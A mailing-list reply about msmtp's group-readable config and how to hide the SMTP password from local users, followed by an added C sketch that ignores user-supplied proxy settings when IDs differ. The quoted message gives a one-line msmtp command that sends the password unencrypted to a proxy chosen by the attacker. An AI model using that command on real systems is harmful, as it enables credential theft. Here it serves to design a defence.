On 2019-11-05 3:30 p.m., Jakub Wilk wrote:
> * Simon Deziel <[email protected]>, 2019-11-05, 10:02:
>> Having /etc/msmtprc group readable is AFAIK, a "debianism".
>
> This is my understanding, too.
>
>> I don't know if upstream endorses this method of restricting access to
>> the default account's password.
>
> I don't believe they do.
>
>> That said, I think it would be feasible for msmtp to obfuscate the
>> AUTH line when the UID/GID do not match the EUID/EGID and the config
>> file used is not world-readable.
>
> That wouldn't be sufficient. The attacker could run:
>
> $ msmtp --proxy-host=$HOST --proxy-port=$PORT --tls=off --auth=plain
> [email protected] < /dev/null
>
> to make msmtp send unencrypted password to a proxy server of the
> attacker's choice.

That's an interesting variation because it also defeats other ways of
concealing the password from users (like a secret helper to decrypt it).

Maybe the proxy directives provided as argument or env vars could be
ignored when the UID/GID do not match the EUID/EGID.

Simon
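
A sketch of the mitigation proposed in the message above, added here as an example; it is not msmtp code and not part of the original message. The `origin` enum, the `proxy_setting` struct and both function names are hypothetical, and the block covers only the proxy directives, not the `--tls` and `--auth` overrides.

```c
#include <stdio.h>
#include <stddef.h>
#include <sys/types.h>
#include <unistd.h>

/* Where a setting came from (hypothetical model, not msmtp's own types). */
enum origin { FROM_CONFIG_FILE, FROM_COMMAND_LINE, FROM_ENVIRONMENT };

struct proxy_setting {
    const char *host;   /* NULL means "no proxy" */
    int port;
    enum origin origin;
};

/* True when real and effective IDs differ, i.e. the process holds an
 * identity from a setuid/setgid bit that the invoking user lacks. */
int ids_differ(uid_t uid, uid_t euid, gid_t gid, gid_t egid)
{
    return uid != euid || gid != egid;
}

/* Drop a proxy supplied by the invoking user when IDs differ.
 * A proxy read from the protected config file is kept.
 * Returns 1 if the setting was ignored, 0 if it was left alone. */
int filter_proxy(struct proxy_setting *p, int elevated)
{
    if (!elevated || p->host == NULL || p->origin == FROM_CONFIG_FILE)
        return 0;
    p->host = NULL;
    p->port = 0;
    return 1;
}

int main(void)
{
    /* Constructed sample: a proxy given on the command line. */
    struct proxy_setting p = { "proxy.example", 1080, FROM_COMMAND_LINE };
    int elevated = ids_differ(getuid(), geteuid(), getgid(), getegid());

    if (filter_proxy(&p, elevated))
        fprintf(stderr, "ignoring user-supplied proxy: real and effective IDs differ\n");
    printf("proxy in effect: %s\n", p.host ? p.host : "(none)");
    return 0;
}
```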

